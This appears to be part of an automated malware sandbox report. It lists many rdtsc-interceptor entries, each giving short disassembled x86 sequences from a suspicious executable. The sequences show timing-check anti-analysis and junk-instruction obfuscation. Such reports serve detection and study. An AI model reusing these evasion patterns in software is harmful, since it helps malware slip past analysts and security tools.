Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA09C1 second address: 4AA09C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA09C5 second address: 4AA09CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA09CB second address: 4AA09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA09D1 second address: 4AA09D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0A35 second address: 4AA0A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0A39 second address: 4AA0A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0A3F second address: 4AA0A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0A45 second address: 4AA0A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0A49 second address: 4AA0A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0A4D second address: 4AA0A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, esi 0x0000000a jmp 00007F36B8869C04h 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0A6F second address: 4AA0A7F instructions: 0x00000000 rdtsc 0x00000002 mov ah, bl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0A7F second address: 4AA0A92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0A92 second address: 4AA0AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D094h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0AAA second address: 4AA0AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0AAE second address: 4A90194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f cmp eax, 00000000h 0x00000012 setne al 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F36B8D8D087h 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007F36BCA5A43Ah 0x00000027 mov edi, edi 0x00000029 jmp 00007F36B8D8D090h 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 mov ecx, 6B97B39Dh 0x00000035 movzx ecx, dx 0x00000038 popad 0x00000039 push eax 0x0000003a jmp 00007F36B8D8D094h 0x0000003f xchg eax, ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90194 second address: 4A90198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90198 second address: 4A9019C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A9019C second address: 4A901A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A901A2 second address: 4A90218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F36B8D8D090h 0x00000010 sub esp, 2Ch 0x00000013 jmp 00007F36B8D8D090h 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov esi, edi 0x0000001e pushfd 0x0000001f jmp 00007F36B8D8D099h 0x00000024 or ecx, 73D3D706h 0x0000002a jmp 00007F36B8D8D091h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90218 second address: 4A90288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d push ebx 0x0000000e pushfd 0x0000000f jmp 00007F36B8869C06h 0x00000014 sbb esi, 2D179008h 0x0000001a jmp 00007F36B8869BFBh 0x0000001f popfd 0x00000020 pop ecx 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F36B8869C00h 0x0000002c xor ax, B268h 0x00000031 jmp 00007F36B8869BFBh 0x00000036 popfd 0x00000037 mov ax, A05Fh 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90317 second address: 4A90345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 0363967Eh 0x00000009 popad 0x0000000a call 00007F36B8D8D08Fh 0x0000000f movzx eax, dx 0x00000012 pop edi 0x00000013 popad 0x00000014 sub edi, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F36B8D8D08Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90345 second address: 4A9039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007F36B8869BFDh 0x0000000c and si, DB66h 0x00000011 jmp 00007F36B8869C01h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a inc ebx 0x0000001b pushad 0x0000001c jmp 00007F36B8869BFCh 0x00000021 popad 0x00000022 test al, al 0x00000024 pushad 0x00000025 call 00007F36B8869BFDh 0x0000002a mov ecx, 028CA577h 0x0000002f pop eax 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A9039A second address: 4A903DF instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F36B8D8D270h 0x0000000e pushad 0x0000000f mov dh, ch 0x00000011 call 00007F36B8D8D093h 0x00000016 movzx ecx, di 0x00000019 pop ebx 0x0000001a popad 0x0000001b lea ecx, dword ptr [ebp-14h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F36B8D8D097h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A903DF second address: 4A9041E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F36B8869C00h 0x0000000c sbb ax, 1D58h 0x00000011 jmp 00007F36B8869BFBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [ebp-14h], edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F36B8869BFBh 0x00000025 mov edx, esi 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A9041E second address: 4A90424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90424 second address: 4A90428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A9043E second address: 4A90479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F36B8D8D091h 0x00000014 sbb ecx, 2421ED06h 0x0000001a jmp 00007F36B8D8D091h 0x0000001f popfd 0x00000020 push ecx 0x00000021 pop edx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90479 second address: 4A90495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8869C08h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A904C2 second address: 4A904C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A904C7 second address: 4A90510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 pushfd 0x00000006 jmp 00007F36B8869BFFh 0x0000000b xor esi, 0552F6FEh 0x00000011 jmp 00007F36B8869C09h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test eax, eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F36B8869BFDh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90510 second address: 4A90520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D08Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90520 second address: 4A90524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90524 second address: 4A90538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F372AC5AFE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90538 second address: 4A9053E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A9053E second address: 4A90544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90544 second address: 4A90548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90548 second address: 4A90630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F36B8D8D0B7h 0x00000011 pushad 0x00000012 mov ebx, ecx 0x00000014 mov si, 5BFFh 0x00000018 popad 0x00000019 cmp dword ptr [ebp-14h], edi 0x0000001c pushad 0x0000001d mov ecx, 4E5BCBF7h 0x00000022 mov di, ax 0x00000025 popad 0x00000026 jne 00007F372AC5AFABh 0x0000002c pushad 0x0000002d mov cx, 1F0Bh 0x00000031 jmp 00007F36B8D8D090h 0x00000036 popad 0x00000037 mov ebx, dword ptr [ebp+08h] 0x0000003a jmp 00007F36B8D8D090h 0x0000003f lea eax, dword ptr [ebp-2Ch] 0x00000042 jmp 00007F36B8D8D090h 0x00000047 xchg eax, esi 0x00000048 jmp 00007F36B8D8D090h 0x0000004d push eax 0x0000004e pushad 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F36B8D8D097h 0x00000056 sbb ecx, 3E537BEEh 0x0000005c jmp 00007F36B8D8D099h 0x00000061 popfd 0x00000062 mov si, 8377h 0x00000066 popad 0x00000067 jmp 00007F36B8D8D08Ch 0x0000006c popad 0x0000006d xchg eax, esi 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F36B8D8D097h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90630 second address: 4A90635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90635 second address: 4A9065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F36B8D8D098h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A9065B second address: 4A9065F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A9065F second address: 4A90665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90665 second address: 4A9066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A9066B second address: 4A906DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c mov ch, ACh 0x0000000e pushfd 0x0000000f jmp 00007F36B8D8D097h 0x00000014 adc ax, 721Eh 0x00000019 jmp 00007F36B8D8D099h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F36B8D8D08Eh 0x00000026 push eax 0x00000027 pushad 0x00000028 mov ebx, 29968DC4h 0x0000002d mov esi, ebx 0x0000002f popad 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F36B8D8D092h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90706 second address: 4A90742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushfd 0x00000006 jmp 00007F36B8869C03h 0x0000000b jmp 00007F36B8869C03h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov esi, eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dx, FF26h 0x0000001d push ebx 0x0000001e pop ecx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90742 second address: 4A9078E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 9F75h 0x00000007 jmp 00007F36B8D8D092h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F36B8D8D08Dh 0x0000001a sbb ecx, 6AA89F36h 0x00000020 jmp 00007F36B8D8D091h 0x00000025 popfd 0x00000026 mov si, 5327h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A9078E second address: 4A9008B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F372A737AACh 0x0000000f xor eax, eax 0x00000011 jmp 00007F36B884332Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov edi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp edi, 00000000h 0x00000028 je 00007F36B8869E07h 0x0000002e call 00007F36BC536C28h 0x00000033 mov edi, edi 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F36B8869C00h 0x0000003c or si, 0C68h 0x00000041 jmp 00007F36B8869BFBh 0x00000046 popfd 0x00000047 mov bx, cx 0x0000004a popad 0x0000004b xchg eax, ebp 0x0000004c jmp 00007F36B8869C02h 0x00000051 push eax 0x00000052 jmp 00007F36B8869BFBh 0x00000057 xchg eax, ebp 0x00000058 jmp 00007F36B8869C06h 0x0000005d mov ebp, esp 0x0000005f jmp 00007F36B8869C00h 0x00000064 xchg eax, ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F36B8869C07h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A9008B second address: 4A900A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D094h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A900A3 second address: 4A900A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A900A7 second address: 4A900B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, di 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A900B9 second address: 4A900FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F36B8869C00h 0x0000000f mov dword ptr [ebp-04h], 55534552h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F36B8869C07h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90C6E second address: 4A90C93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F36B8D8D090h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90C93 second address: 4A90CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90D8C second address: 4A90DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov bx, B626h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 361B343Ch 0x00000012 jmp 00007F36B8D8D08Ah 0x00000017 xor dword ptr [esp], 4081A814h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F36B8D8D08Eh 0x00000025 jmp 00007F36B8D8D095h 0x0000002a popfd 0x0000002b push eax 0x0000002c jmp 00007F36B8D8D097h 0x00000031 pop ecx 0x00000032 popad 0x00000033 call 00007F372AC51E09h 0x00000038 push 76952B70h 0x0000003d push dword ptr fs:[00000000h] 0x00000044 mov eax, dword ptr [esp+10h] 0x00000048 mov dword ptr [esp+10h], ebp 0x0000004c lea ebp, dword ptr [esp+10h] 0x00000050 sub esp, eax 0x00000052 push ebx 0x00000053 push esi 0x00000054 push edi 0x00000055 mov eax, dword ptr [769B4538h] 0x0000005a xor dword ptr [ebp-04h], eax 0x0000005d xor eax, ebp 0x0000005f push eax 0x00000060 mov dword ptr [ebp-18h], esp 0x00000063 push dword ptr [ebp-08h] 0x00000066 mov eax, dword ptr [ebp-04h] 0x00000069 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000070 mov dword ptr [ebp-08h], eax 0x00000073 lea eax, dword ptr [ebp-10h] 0x00000076 mov dword ptr fs:[00000000h], eax 0x0000007c ret 0x0000007d push eax 0x0000007e push edx 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90DFA second address: 4A90DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A90DFE second address: 4A90E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0B32 second address: 4AA0B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0B38 second address: 4AA0B51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0B51 second address: 4AA0B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0B58 second address: 4AA0B8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F36B8D8D092h 0x00000009 sub eax, 704FA278h 0x0000000f jmp 00007F36B8D8D08Bh 0x00000014 popfd 0x00000015 mov edi, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0B8C second address: 4AA0B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0B90 second address: 4AA0BA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0BA7 second address: 4AA0BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8869C04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0BBF second address: 4AA0BF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F36B8D8D08Fh 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F36B8D8D091h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0BF6 second address: 4AA0C3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F36B8869BFEh 0x00000011 test esi, esi 0x00000013 jmp 00007F36B8869C00h 0x00000018 je 00007F372A71737Fh 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movsx edi, si 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0C3D second address: 4AA0C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [769B459Ch], 05h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F36B8D8D096h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0C66 second address: 4AA0C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0C6C second address: 4AA0CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F372AC528A9h 0x0000000e pushad 0x0000000f mov di, B88Ah 0x00000013 pushfd 0x00000014 jmp 00007F36B8D8D08Bh 0x00000019 or ax, F72Eh 0x0000001e jmp 00007F36B8D8D099h 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F36B8D8D08Dh 0x0000002d rdtsc
